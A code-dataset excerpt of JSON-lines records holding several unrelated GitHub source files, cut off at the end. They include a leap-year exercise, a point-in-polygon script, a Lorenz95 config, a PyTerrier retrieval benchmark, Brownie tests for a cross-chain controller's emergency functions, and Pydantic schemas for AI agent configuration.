irshif\n\n\nyear=int(input(\"Which year do you want to check?\"))\nif year%4==0:\n if year%100==0:\n if year%400==0:\n print(\"it is a leap year\")\n else:\n print(\"it is not a leap year\")\n else:\n print(\"it is a leap year\") \nelse:\n print(\"it is not leap year\")\n\n\n\n\n\n\n","repo_name":"Karen-yuan/100_days_of_Python","sub_path":"Day3/multiple_ex.py","file_name":"multiple_ex.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2553548875","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef read_file(path, read_header=False):\n with open(path, \"r+\") as f:\n rows = f.readlines()\n if not read_header:\n rows = rows[1:]\n cols = []\n for row in rows:\n col = str.split(row)\n if len(col) == 0:\n continue\n if len(col) == 1:\n cols.append([int(col[0])])\n else:\n cols.append([int(c) for c in col])\n return cols\n\n\ndef write_file(path, header, data):\n with open(path, \"w+\") as f:\n if header is not None:\n row = \"\"\n for h in header:\n row += \"\\t\" + h\n row = row[1:] + \"\\n\"\n f.write(row)\n for cols in data:\n row = \"\"\n for col in cols:\n row += \"\\t\" + str(col)\n row = row[1:] + \"\\n\"\n f.write(row)\n\n\ndef show(input_polygon_path, input_points_path):\n coords = np.array(read_file(input_polygon_path, read_header=True))\n coords = coords.transpose()\n x = coords[0]\n x = np.append(x, x[0])\n y = coords[1]\n y = np.append(y, y[0])\n plt.plot(x, y, color='r')\n plt.scatter(x, y, color='b')\n\n coords = np.array(read_file(input_points_path, read_header=True))\n coords = coords.transpose()\n x = coords[0]\n y = coords[1]\n plt.scatter(x, y, color='g')\n plt.show()\n\n\n# detect a point (old version using numpy)\n# def is_point_in_polygon(polygon_coordinate, point):\n# numof_lines_in_polygon = polygon_coordinate.shape[0]\n# x, y = point\n# flag_left = 0\n# flag_right = 0\n# for i in range(numof_lines_in_polygon):\n# point1_in_polygon = polygon_coordinate[i]\n# if i == numof_lines_in_polygon - 1:\n# point2_in_polygon = polygon_coordinate[0]\n# else:\n# point2_in_polygon = polygon_coordinate[i + 1]\n# # point is one of the vertex\n# if point is point1_in_polygon or point is point2_in_polygon:\n# return True\n# # point located between two endpoints of polygon's edge\n# elif point1_in_polygon[1] > y > point2_in_polygon[1] or point2_in_polygon[1] > y > point1_in_polygon[1]:\n# # intersection_point is edge intersect with a horizontal line which through input point\n# if point1_in_polygon[0] == point2_in_polygon[0]:\n# intersection_point_x = point1_in_polygon[0]\n# else:\n# # y = kx + b...\n# intersection_point_x = point2_in_polygon[0] + (y - point2_in_polygon[1]) / (\n# (point2_in_polygon[1] - point1_in_polygon[1]) / (\n# point2_in_polygon[0] - point1_in_polygon[0]))\n# if intersection_point_x == x:\n# # point is a intersection_point\n# return True\n# if intersection_point_x < x:\n# flag_left += 1\n# else:\n# flag_right += 1\n# # point and endpoint are horizontal\n# else:\n# if point2_in_polygon[1] == y:\n# pass\n# elif point1_in_polygon[1] == y:\n# # get first endpoint of last edge\n# last_point1_in_polygon = polygon_coordinate[i - 1]\n# if (point2_in_polygon[1] < y < last_point1_in_polygon[1]) or (\n# last_point1_in_polygon[1] < y < point2_in_polygon[1]):\n# if point1_in_polygon[0] < x:\n# flag_left += 1\n# else:\n# flag_right += 1\n# else:\n# pass\n#\n# if flag_right % 2 == 0:\n# return False\n# else:\n# return True\n\n\n# detect a point do not use numpy\ndef is_point_in_polygon_no_numpy(polygon_coordinate_x, polygon_coordinate_y, point):\n numof_lines_in_polygon = len(polygon_coordinate_x)\n x, y = point\n flag_left = 0\n flag_right = 0\n for i in range(numof_lines_in_polygon):\n point1_in_polygon = [polygon_coordinate_x[i], polygon_coordinate_y[i]]\n if i == numof_lines_in_polygon - 1:\n point2_in_polygon = [polygon_coordinate_x[0], polygon_coordinate_y[0]]\n else:\n point2_in_polygon = [polygon_coordinate_x[i + 1], polygon_coordinate_y[i + 1]]\n # point is one of the vertex\n if point is point1_in_polygon or point is point2_in_polygon:\n return True\n # point located between two endpoints of polygon's edge\n elif point1_in_polygon[1] > y > point2_in_polygon[1] or point2_in_polygon[1] > y > point1_in_polygon[1]:\n # edge is vertical\n if point1_in_polygon[0] == point2_in_polygon[0]:\n intersection_point_x = point1_in_polygon[0]\n else:\n # y = kx + b...\n intersection_point_x = point2_in_polygon[0] + (y - point2_in_polygon[1]) / (\n (point2_in_polygon[1] - point1_in_polygon[1]) / (\n point2_in_polygon[0] - point1_in_polygon[0]))\n if intersection_point_x == x:\n # point is a intersection_point\n return True\n if intersection_point_x < x:\n flag_left += 1\n else:\n flag_right += 1\n # point and endpoint are horizontal\n else:\n if point2_in_polygon[1] == y:\n pass\n elif point1_in_polygon[1] == y:\n # get first endpoint of last edge\n last_point1_in_polygon = [polygon_coordinate_x[i - 1], polygon_coordinate_y[i - 1]]\n if (point2_in_polygon[1] < y < last_point1_in_polygon[1]) or (\n last_point1_in_polygon[1] < y < point2_in_polygon[1]):\n if point1_in_polygon[0] < x:\n flag_left += 1\n else:\n flag_right += 1\n else:\n pass\n\n if flag_right % 2 == 0:\n return False\n else:\n return True\n\n\n# detect points (old version using numpy)\n# def is_points_in_polygon(polygon_coordinate, points_coordinate):\n# numof_points = points_coordinate.shape[0]\n# result = [\"\" for _ in range(numof_points)]\n# x_max, y_max = np.max(polygon_coordinate, axis=0)\n# x_min, y_min = np.min(polygon_coordinate, axis=0)\n#\n# for i in range(numof_points):\n# x, y = points_coordinate[i]\n# # detect border\n# if x < x_min or x > x_max or y < y_min or y > y_max:\n# result[i] = 'outside'\n# else:\n# if is_point_in_polygon(polygon_coordinate, points_coordinate[i]):\n# result[i] = 'inside'\n# else:\n# result[i] = 'outside'\n# return result\n\n\n# detect points do not use numpy\ndef is_points_in_polygon_no_numpy(polygon_coordinate_list, points_coordinate_list):\n numof_points = len(points_coordinate_list)\n result = [\"\" for _ in range(numof_points)]\n polygon_coordinate_x = []\n polygon_coordinate_y = []\n points_coordinate_x = []\n points_coordinate_y = []\n for coord in polygon_coordinate_list:\n polygon_coordinate_x.append(coord[0])\n polygon_coordinate_y.append(coord[1])\n for coord in points_coordinate_list:\n points_coordinate_x.append(coord[0])\n points_coordinate_y.append(coord[1])\n x_max, y_max = max(polygon_coordinate_x), max(polygon_coordinate_y)\n x_min, y_min = min(polygon_coordinate_x), min(polygon_coordinate_y)\n\n for i in range(numof_points):\n x, y = points_coordinate_x[i], points_coordinate_y[i],\n # detect border\n if x < x_min or x > x_max or y < y_min or y > y_max:\n result[i] = 'outside'\n else:\n if is_point_in_polygon_no_numpy(polygon_coordinate_x, polygon_coordinate_y,\n [points_coordinate_x[i], points_coordinate_y[i]]):\n result[i] = 'inside'\n else:\n result[i] = 'outside'\n return result\n\n\ndef main():\n polygon_path = \"input_data/input_question_6_polygon\"\n points_path = \"input_data/input_question_6_points\"\n output_path = \"./output_question_6\"\n # show(polygon_path, points_path)\n polygon_coordinate_list = read_file(polygon_path, read_header=True)\n # polygon_coordinate = np.array(polygon_coordinate_list)\n points_coordinate_list = read_file(points_path, read_header=True)\n # points_coordinate = np.array(points_coordinate_list)\n\n result = is_points_in_polygon_no_numpy(polygon_coordinate_list, points_coordinate_list)\n # result = is_points_in_polygon(polygon_coordinate, points_coordinate)\n\n print(polygon_coordinate_list)\n print(points_coordinate_list)\n print(result)\n\n with open(output_path, \"w+\") as f:\n for i in range(len(result)):\n data = \"\"\n for j in points_coordinate_list[i]:\n data += str(j) + \"\\t\"\n data += result[i] + \"\\n\"\n f.write(data)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JiaaZe/AY20_MBDS_answers","sub_path":"Question 6/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7606528449","text":"# From Fig. 1 of Bocquet 2010 \"Beyond Gaussian Statistical Modeling\n# in Geophysical Data Assimilation\".\nfrom common import *\n\nfrom mods.Lorenz95 import core\n\nt = Chronology(0.05,dkObs=1,T=4**3,BurnIn=20)\n\nNx = 10\nDyn = {\n 'M' : Nx,\n 'model': core.step,\n 'noise': 0\n }\n\nX0 = GaussRV(M=Nx, C=0.001)\n\njj = arange(0,Nx,2)\nObs = partial_direct_Obs(Nx,jj)\nObs['noise'] = 1.5\n \nHMM = HiddenMarkovModel(Dyn,Obs,t,X0)\n\n####################\n# Suggested tuning\n####################\n# Why are these benchmarks superior to those in the article?\n# We use, in the EnKF,\n# - inflation instead of additive noise ?\n# - Sqrt instead of perturbed obs\n# - random orthogonal rotations.\n# The particle filters are also probably better tuned:\n# - jitter covariance proportional to ensemble (weighted) cov\n# - no jitter on unique particles after resampling\n#\n# For a better \"picture\" of the relative performances,\n# see benchmarks in presentation from SIAM_SEAS.\n# Note: They are slightly unrealiable (short runs).\n\n# Expected RMSE_a:\n# cfgs += EnKF_N(N=8,rot=True,xN=1.3) # 0.31\n\n# cfgs += PartFilt(N=50 ,NER=0.3 ,reg=1.7) # 1.0\n# cfgs += PartFilt(N=100,NER=0.2 ,reg=1.3) # 0.36\n# cfgs += PartFilt(N=800,NER=0.2 ,reg=0.8) # 0.25\n\n# cfgs += OptPF( N=50 ,NER=0.25,reg=1.4,Qs=0.4) # 0.61\n# cfgs += OptPF( N=100,NER=0.2 ,reg=1.0,Qs=0.3) # 0.37\n# cfgs += OptPF( N=800,NER=0.2 ,reg=0.6,Qs=0.1) # 0.25\n\n# cfgs += PFa( N=50 ,alpha=0.4,NER=0.5,reg=1.0) # 0.45\n# cfgs += PFa( N=100,alpha=0.3,NER=0.4,reg=1.0) # 0.38\n\n# cfgs += PFxN (N=30, NER=0.4, Qs=1.0,xN=1000) # 0.48\n# cfgs += PFxN (N=50, NER=0.3, Qs=1.1,xN=100 ) # 0.43\n# cfgs += PFxN (N=100,NER=0.2, Qs=1.0,xN=100 ) # 0.32\n# cfgs += PFxN (N=400,NER=0.2, Qs=0.8,xN=100 ) # 0.27\n# cfgs += PFxN (N=800,NER=0.2, Qs=0.6,xN=100 ) # 0.25\n\n# cfgs += PFxN_EnKF(N=25 ,NER=0.4 ,Qs=1.5,xN=100) # 0.49\n# cfgs += PFxN_EnKF(N=50 ,NER=0.25,Qs=1.5,xN=100) # 0.36\n# cfgs += PFxN_EnKF(N=100,NER=0.20,Qs=1.0,xN=100) # 0.32\n# cfgs += PFxN_EnKF(N=300,NER=0.10,Qs=1.0,xN=100) # 0.28\n","repo_name":"franktoffel/dapper","sub_path":"mods/Lorenz95/boc10.py","file_name":"boc10.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16259992141","text":"import pandas as pd\nimport pyterrier as pt\npt.init()\n\n# download tripjudge here: https://github.com/sophiaalthammer/tripjudge\nqrels = pd.read_csv('./tripjudge/data/qrels_2class.txt', sep=' ', names=['qid', 'Q0', 'docno', 'label'])\nqrels['qid'] = qrels['qid'].apply(str)\nqrels['docno'] = qrels['docno'].apply(str)\n\ndataset = pt.get_dataset('irds:tripclick/test/head')\nindex = pt.IndexFactory.of('./indices/tripclick/data.properties')\n\nDFRee = pt.BatchRetrieve(index, wmodel=\"DFRee\") >> pt.pipelines.PerQueryMaxMinScoreTransformer()\nDl = pt.BatchRetrieve(index, wmodel=\"Dl\") >> pt.pipelines.PerQueryMaxMinScoreTransformer()\n\nalphas = [.4, .45, .5, .55, .6, .65, .7, .75, .8, .85, .9, .95, 1]\n\nsystems = [\n (1 - alpha)* DFRee + alpha * Dl for alpha in alphas\n]\n\nexp_res = pt.Experiment(\n systems,\n dataset.get_topics(),\n qrels,\n eval_metrics=['P_20', 'ndcg_cut_20', 'map'],\n names = [str(alpha) for alpha in alphas]\n)\n\nexp_res.to_csv('./experimental_results/benchmark.irm.tripjudge.2.grade.csv', index=False)\nprint(exp_res.to_markdown(tablefmt=\"grid\", floatfmt=\"0.4f\"))\n\n","repo_name":"irgroup/validating-synthetic-usage-data","sub_path":"src/benchmark_irm.py","file_name":"benchmark_irm.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15156131811","text":"import brownie\nimport pytest\n\nfrom brownie import (\n # Brownie helpers\n accounts,\n web3,\n reverts,\n Wei,\n chain,\n Contract,\n)\n\nfrom eth_abi import encode_abi, encode_single\n\ndef test_basic(setup_protocol):\n \"\"\"\n basic check to ensure the correctness of the setup\n \"\"\"\n proxy_admin = setup_protocol[\"proxy_admin\"]\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n cross_chain_controller_emergency_mode_logic = setup_protocol[\"cross_chain_controller_emergency_mode_logic\"]\n\n info = proxy_admin.getProxyImplementation(cross_chain_controller_emergency_mode)\n\n assert info == cross_chain_controller_emergency_mode_logic.address\n\n\ndef test_constructor(setup_protocol):\n \"\"\"\n checking the variable set in the constructor in the CrossChainController proxy\n \"\"\"\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n cl_emergency_oracle = setup_protocol[\"cl_emergency_oracle\"]\n assert cross_chain_controller_emergency_mode.getChainlinkEmergencyOracle() == cl_emergency_oracle\n\n\ndef test_initialize(\n setup_protocol, owner, guardian, MainnetChainIds, bridge_adapter, carol\n):\n \"\"\"\n Testing the initialization\n \"\"\"\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n current_chain_bridge_adapter = setup_protocol[\"current_chain_bridge_adapter\"]\n destination_chain_bridge_adapter = setup_protocol[\"destination_chain_bridge_adapter\"]\n cl_emergency_oracle = setup_protocol[\"cl_emergency_oracle\"]\n # Validation\n assert cross_chain_controller_emergency_mode.guardian() == guardian\n assert cross_chain_controller_emergency_mode.owner() == owner\n assert cross_chain_controller_emergency_mode.getChainlinkEmergencyOracle() == cl_emergency_oracle\n adapters = cross_chain_controller_emergency_mode.getReceiverBridgeAdaptersByChain(chain.id)\n assert adapters[0] == bridge_adapter\n bridge_config = cross_chain_controller_emergency_mode.getForwarderBridgeAdaptersByChain(MainnetChainIds.POLYGON)[0]\n assert bridge_config[0] == destination_chain_bridge_adapter # destinationBridgeAdapter\n assert bridge_config[1] == current_chain_bridge_adapter # currentChainBridgeAdapter\n assert cross_chain_controller_emergency_mode.isSenderApproved(carol) is True\n\n\n###########################################\n##### Tests for EmergencyConsumer #######\n###########################################\n\ndef test_update_cl_emergency_oracle(setup_protocol, owner, alice):\n \"\"\"\n Testing `updateCLEmergencyOracle()`\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n chainlink_emergency_oracle = alice # just for testing\n tx = cross_chain_controller_emergency_mode.updateCLEmergencyOracle(chainlink_emergency_oracle, {\"from\": owner} )\n\n # Validation\n assert tx.events[\"CLEmergencyOracleUpdated\"][\"chainlinkEmergencyOracle\"] == chainlink_emergency_oracle\n assert cross_chain_controller_emergency_mode.getChainlinkEmergencyOracle() == chainlink_emergency_oracle\n\n\ndef test_update_cl_emergency_oracle_not_owner(setup_protocol, alice):\n \"\"\"\n Testing `updateCLEmergencyOracle()`, caller not the owner\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n chainlink_emergency_oracle = alice # just for testing\n\n with reverts(\"Ownable: caller is not the owner\"):\n cross_chain_controller_emergency_mode.updateCLEmergencyOracle(chainlink_emergency_oracle, {\"from\": alice} )\n\n\ndef test_update_cl_emergency_oracle_zero_address(setup_protocol, owner, constants):\n \"\"\"\n Testing `updateCLEmergencyOracle()` when the oracle = address(0)\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n chainlink_emergency_oracle = constants.ZERO_ADDRESS\n with reverts(\"28\"): #INVALID_EMERGENCY_ORACLE\n cross_chain_controller_emergency_mode.updateCLEmergencyOracle(chainlink_emergency_oracle, {\"from\": owner} )\n\n\n\n############################################################\n#### Tests for CrossChainControllerWithEmergencyMode ######\n############################################################\n\ndef test_solve_emergency(setup_protocol, guardian, alice, carol, MainnetChainIds, bridge_adapter, Empty):\n \"\"\"\n Testing `solveEmergency()`\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n cl_emergency_oracle = setup_protocol[\"cl_emergency_oracle\"]\n current_chain_bridge_adapter = setup_protocol[\"current_chain_bridge_adapter\"]\n\n # newConformations\n required_confirmation = 2\n chain_id = MainnetChainIds.POLYGON\n new_confirmation_1 = [chain_id, required_confirmation]\n\n required_confirmation = 1\n chain_id = MainnetChainIds.AVALANCHE\n new_confirmation_2 = [chain_id, required_confirmation]\n\n new_confirmations = [new_confirmation_1, new_confirmation_2]\n\n # ValidityTimestampInput\n chain_id = MainnetChainIds.POLYGON\n validity_timestamp = 1689000000\n validity_timestamp_input = [[chain_id, validity_timestamp]]\n\n # receiverBridgeAdaptersToDisallow\n\n receiver_adapter_to_disallow = [[bridge_adapter.address, [chain.id]]]\n\n # receiverBridgeAdaptersToAllow\n receiver_adapter_to_allow_1 = [alice.address, [MainnetChainIds.POLYGON, MainnetChainIds.AVALANCHE]]\n\n receiver_adapter_to_allow_2 = [carol.address, [MainnetChainIds.POLYGON]]\n\n receiver_adapter_to_allow = [receiver_adapter_to_allow_1, receiver_adapter_to_allow_2]\n\n #sendersToRemove\n senders_to_remove = []\n\n #senderToApprove\n senders_to_approve = [alice.address]\n\n #forwarderBridgeAdaptersToDisable\n bridge_adapter_to_disable = [[current_chain_bridge_adapter.address, [MainnetChainIds.POLYGON]]]\n\n #forwarderBridgeAdaptersToEnable\n current_chain_bridge_adapter = Empty.deploy({\"from\": carol})\n destination_chain_bridge_adapter = Empty.deploy({\"from\": carol})\n\n bridge_adapter_to_enable = [[current_chain_bridge_adapter, destination_chain_bridge_adapter, MainnetChainIds.AVALANCHE]]\n\n # set answer a value != 0 so that the modifier `onlyInEmergency` do not revert\n answer = 1\n cl_emergency_oracle.setAnswer(answer, {\"from\": alice})\n\n\n # call solveEmergency()\n tx = cross_chain_controller_emergency_mode.solveEmergency(\n new_confirmations,\n validity_timestamp_input,\n receiver_adapter_to_allow,\n receiver_adapter_to_disallow,\n senders_to_approve,\n senders_to_remove,\n bridge_adapter_to_enable,\n bridge_adapter_to_disable,\n {\"from\": guardian}\n )\n\n assert \"ReceiverBridgeAdaptersUpdated\" in tx.events\n assert \"NewInvalidation\" in tx.events\n assert \"ConfirmationsUpdated\" in tx.events\n assert \"SenderUpdated\" in tx.events\n assert tx.events[\"EmergencySolved\"][\"emergencyCount\"] == answer\n assert cross_chain_controller_emergency_mode.getEmergencyCount() == answer\n\n\ndef test_solve_emergency_not_in_emergency(setup_protocol, guardian, alice, carol, MainnetChainIds, bridge_adapter, Empty):\n \"\"\"\n Testing `solveEmergency()`, when the answer from CL Emergency Oracle is 0\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n current_chain_bridge_adapter = setup_protocol[\"current_chain_bridge_adapter\"]\n\n # newConformations\n required_confirmation = 2\n chain_id = MainnetChainIds.POLYGON\n new_confirmation_1 = [chain_id, required_confirmation]\n\n required_confirmation = 1\n chain_id = MainnetChainIds.AVALANCHE\n new_confirmation_2 = [chain_id, required_confirmation]\n\n new_confirmations = [new_confirmation_1, new_confirmation_2]\n\n # ValidityTimestampInput\n chain_id = MainnetChainIds.POLYGON\n validity_timestamp = 1689000000\n validity_timestamp_input = [[chain_id, validity_timestamp]]\n\n # receiverBridgeAdaptersToDisallow\n\n receiver_adapter_to_disallow = [[bridge_adapter.address, [chain.id]]]\n\n # receiverBridgeAdaptersToAllow\n receiver_adapter_to_allow_1 = [alice.address, [MainnetChainIds.POLYGON, MainnetChainIds.AVALANCHE]]\n\n receiver_adapter_to_allow_2 = [carol.address, [MainnetChainIds.POLYGON]]\n\n receiver_adapter_to_allow = [receiver_adapter_to_allow_1, receiver_adapter_to_allow_2]\n\n #sendersToRemove\n senders_to_remove = []\n\n #senderToApprove\n senders_to_approve = [alice.address]\n\n #forwarderBridgeAdaptersToDisable\n bridge_adapter_to_disable = [[current_chain_bridge_adapter.address, [MainnetChainIds.POLYGON]]]\n\n #forwarderBridgeAdaptersToEnable\n current_chain_bridge_adapter = Empty.deploy({\"from\": carol})\n destination_chain_bridge_adapter = Empty.deploy({\"from\": carol})\n\n bridge_adapter_to_enable = [[current_chain_bridge_adapter, destination_chain_bridge_adapter, MainnetChainIds.AVALANCHE]]\n\n\n with reverts(\"29\"): #NOT_IN_EMERGENCY\n\n # call solveEmergency()\n tx = cross_chain_controller_emergency_mode.solveEmergency(\n new_confirmations,\n validity_timestamp_input,\n receiver_adapter_to_allow,\n receiver_adapter_to_disallow,\n senders_to_approve,\n senders_to_remove,\n bridge_adapter_to_enable,\n bridge_adapter_to_disable,\n {\"from\": guardian}\n )\n\n\ndef test_emergency_token_transfer(setup_protocol, owner, deploy_usdt, alice):\n \"\"\"\n Testing emergencyTokenTransfer()\n \"\"\"\n\n cross_chain_controller = setup_protocol[\"cross_chain_controller\"]\n usdt = deploy_usdt\n\n amount_1 = 1000 * 10**6\n usdt.transfer(cross_chain_controller, amount_1, {\"from\": owner})\n\n amount_2 = 800 * 10**6\n tx = cross_chain_controller.emergencyTokenTransfer(usdt, alice, amount_2, {\"from\": owner} )\n\n # Validation\n assert usdt.balanceOf(cross_chain_controller) == amount_1 - amount_2\n assert usdt.balanceOf(alice) == amount_2\n assert tx.events[\"ERC20Rescued\"][\"caller\"] == owner\n assert tx.events[\"ERC20Rescued\"][\"token\"] == usdt.address\n assert tx.events[\"ERC20Rescued\"][\"to\"] == alice\n\n\n\ndef test_emergency_ether_transfer(setup_protocol, owner, deploy_usdt, alice):\n \"\"\"\n Testing emergencyEtherTransfer()\n \"\"\"\n\n cross_chain_controller = setup_protocol[\"cross_chain_controller\"]\n usdt = deploy_usdt\n\n amount_1 = 5 * 10**18\n owner.transfer(cross_chain_controller, amount_1)\n\n amount_2 = 3 * 10**18\n tx = cross_chain_controller.emergencyEtherTransfer(alice, amount_2, {\"from\": owner} )\n\n # Validation\n assert cross_chain_controller.balance() == amount_1 - amount_2\n assert tx.events[\"NativeTokensRescued\"][\"caller\"] == owner\n assert tx.events[\"NativeTokensRescued\"][\"to\"] == alice\n assert tx.events[\"NativeTokensRescued\"][\"amount\"] == amount_2\n\n\n\n\n\n","repo_name":"sigp/aave-public-tests","sub_path":"aave-delivery-infrastructure/tests/tests/test_CrossChainControllerWithEmergencyMode.py","file_name":"test_CrossChainControllerWithEmergencyMode.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29895671892","text":"from enum import Enum\nfrom typing import Dict, List, Optional\n\nfrom pydantic import UUID4, BaseModel, Field\n\nfrom typings.user import UserOutput\n\n\nclass AgentType(str, Enum):\n voice = \"voice\"\n text = \"text\"\n\n\nclass DataSourceFlow(str, Enum):\n PRE_RETRIEVAL = \"pre_execution\"\n SOURCE_DETECTION = \"source_detection\"\n\n\nclass InputModeType(List[str], Enum):\n text = [\"Text\"]\n voice = [\"Voice\"]\n text_voice = [\"Text\", \"Voice\"]\n\n\nclass AgentInput(BaseModel):\n name: str = Field(..., example=\"Agent Smith\")\n description: Optional[str] = Field(None, example=\"Description of the agent\")\n agent_type: Optional[AgentType] = Field(\n None,\n example=AgentType.voice,\n description=\"You have to choose between Text-based and Voice-based agents.\",\n )\n workspace_id: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n role: Optional[str] = Field(\n None, example=\"Speaker\", description=\"A role can be anything of your choosing.\"\n )\n is_memory: Optional[bool] = Field(None, example=True)\n avatar: Optional[str] = Field(\n None,\n example=\"https://raw.githubusercontent.com/l3vels/L3AGI/77d65c9ad74d4da140ef7a30590f063768333bd9/apps/ui/src/assets/tools/openweather.svg\",\n )\n is_template: bool = Field(None, example=True)\n\n\nclass ConfigInput(BaseModel):\n goals: List[str] = Field(\n ...,\n example=[\n \"Provide a concise summary or highlight about the sourced articles.\",\n \"Efficiently locate relevant scientific articles from arxiv.org based on user queries.\",\n ],\n description=\"A list of goals that the agent aims to achieve. These goals can include providing summaries, locating relevant articles, or any other specific objectives.\",\n )\n constraints: List[str] = Field(\n ...,\n example=[\n \"Does not replace professional advice or expert consultations in respective fields.\",\n \"Does not provide opinions or expert analysis. Presents only factual information based on sourced content.\",\n ],\n description=\"A list of constraints or limitations that the agent adheres to. These constraints can include not replacing professional advice, not providing opinions or expert analysis, and presenting only factual information based on sourced content.\",\n )\n tools: List[str] = Field(\n ...,\n example=[\n \"59209d41-83cf-48c5-806a-ec87a55cdcc4\",\n \"ac34d174-6ca4-49cf-aef2-6e2cdf2e0028\",\n ],\n description=\"You should pass an array of Toolkit IDs.\",\n )\n datasources: List[str] = Field(\n ...,\n example=[\"0b9d648f-0fcb-4ced-8e08-502c5b8e0c06\"],\n description=\"You should pass an array of Data Source IDs which you have created.\",\n )\n model: Optional[str] = Field(\n None,\n example=\"8833a90e-86e4-4118-9e28-517de1a4def8\",\n description=\"Expects Model ID\",\n )\n temperature: float = Field(\n ...,\n gt=0,\n le=1.0,\n example=0.5,\n description=\"The temperature parameter for the agent. It should be a float value between 0 and 1, representing the level of randomness in the agent's responses. A higher value like 1.0 will result in more random responses, while a lower value like 0.5 will make the responses more focused and deterministic.\",\n )\n instructions: List[str] = Field(\n ...,\n example=[\n \"The more specific your inquiry, the more accurate Maven's assistance will be.\",\n \"Efficiently locate relevant scientific articles from arxiv.org based on user queries.\",\n ],\n description=\"A list of instructions or guidance for interacting with the agent. These instructions can include tips on how to get more accurate assistance or specific guidelines for using certain features.\",\n )\n suggestions: Optional[List[str]] = Field(\n None,\n example=[\n \"What's the weather like today?\",\n \"Tell me a joke.\",\n \"How can I contact customer support?\",\n ],\n description=\"An array of suggested dialogs or questions that users can choose from to interact with the system.\",\n )\n greeting: Optional[str] = Field(\n None,\n example=\"Hello! I'm the ArXiv & Wikipedia Expert, your dedicated assistant for both academic research and general knowledge. How may I assist you today?\",\n description=\"A greeting message displayed by the assistant to welcome users and provide an introduction to its capabilities.\",\n )\n text: Optional[str] = Field(None, example=\"text\")\n integrations: Optional[List[Dict]] = Field(None)\n source_flow: Optional[str]\n synthesizer: Optional[str] = Field(\n None,\n example=\"142e60f5-2d46-4b1a-9054-0764e553eed6\",\n description=\"only on `voice-based` agents!
Expects Voice Tool ID (Play.HT, ElevenLabs, Azure)\",\n )\n default_voice: Optional[str] = Field(\n None, example=\"default_voice\", description=\"only on `voice-based` agents!\"\n )\n voice_id: Optional[str] = Field(\n None, example=\"voice_id\", description=\"only on `voice-based` agents!\"\n )\n transcriber: Optional[str] = Field(\n None,\n example=\"b44769b1-1a20-44d3-b0f1-8b4c96e6a02a\",\n description=\"only on `voice-based` agents!
Expects Voice Tool ID (Deepgram, Azure)\",\n )\n response_mode: Optional[list[str]] = Field(\n None, example=[\"Voice\"], description=\"only on `voice-based` agents!\"\n )\n input_mode: Optional[list[str]] = Field(\n None, example=[\"Voice\"], description=\"only on `voice-based` agents!\"\n )\n runners: Optional[List[Dict]] = Field(\n None, example=[{\"task\": \"value1\"}, {\"task\": \"value2\"}]\n )\n sentiment_analyzer: Optional[Dict[str, str]] = Field(\n None, example={\"task\": \"\", \"runner\": \"\"}\n )\n\n\nclass AgentConfigInput(BaseModel):\n agent: AgentInput\n configs: ConfigInput\n\n\nclass CreateVoiceAgentInput(BaseModel):\n template_id: UUID4\n name: Optional[str] = \"\"\n description: Optional[str] = \"\"\n\n\nclass ConfigsOutput(BaseModel):\n goals: List[str]\n constraints: List[str]\n tools: List[str]\n datasources: List[str]\n model: Optional[str]\n temperature: float\n instructions: List[str]\n suggestions: Optional[List[str]]\n greeting: Optional[str]\n text: Optional[str]\n integrations: Optional[List[Dict]]\n source_flow: Optional[str]\n synthesizer: Optional[str]\n default_voice: Optional[str]\n voice_id: Optional[str]\n transcriber: Optional[str]\n response_mode: Optional[List[str]]\n input_mode: Optional[List[str]]\n runners: Optional[List[Dict]]\n sentiment_analyzer: Optional[Dict]\n\n\nclass AgentOutput(BaseModel):\n id: UUID4\n name: str = Field(..., example=\"Agent Smith\")\n description: str = Field(..., example=\"Description of the agent\")\n agent_type: Optional[str] = Field(None, example=\"voice\")\n workspace_id: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n parent_id: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n role: str = Field(..., example=\"Speaker\")\n is_template: bool\n is_deleted: bool\n is_public: bool\n account_id: UUID4 = Field(..., example=\"550e8400-e29b-41d4-a716-446655440000\")\n created_by: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n creator: Optional[UserOutput]\n modified_by: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n is_memory: Optional[bool]\n avatar: Optional[str] = Field(\n None,\n example=\"https://raw.githubusercontent.com/l3vels/L3AGI/77d65c9ad74d4da140ef7a30590f063768333bd9/apps/ui/src/assets/tools/openweather.svg\",\n )\n\n\nclass AgentWithConfigsOutput(BaseModel):\n agent: AgentOutput\n configs: Optional[ConfigsOutput]\n system_message: 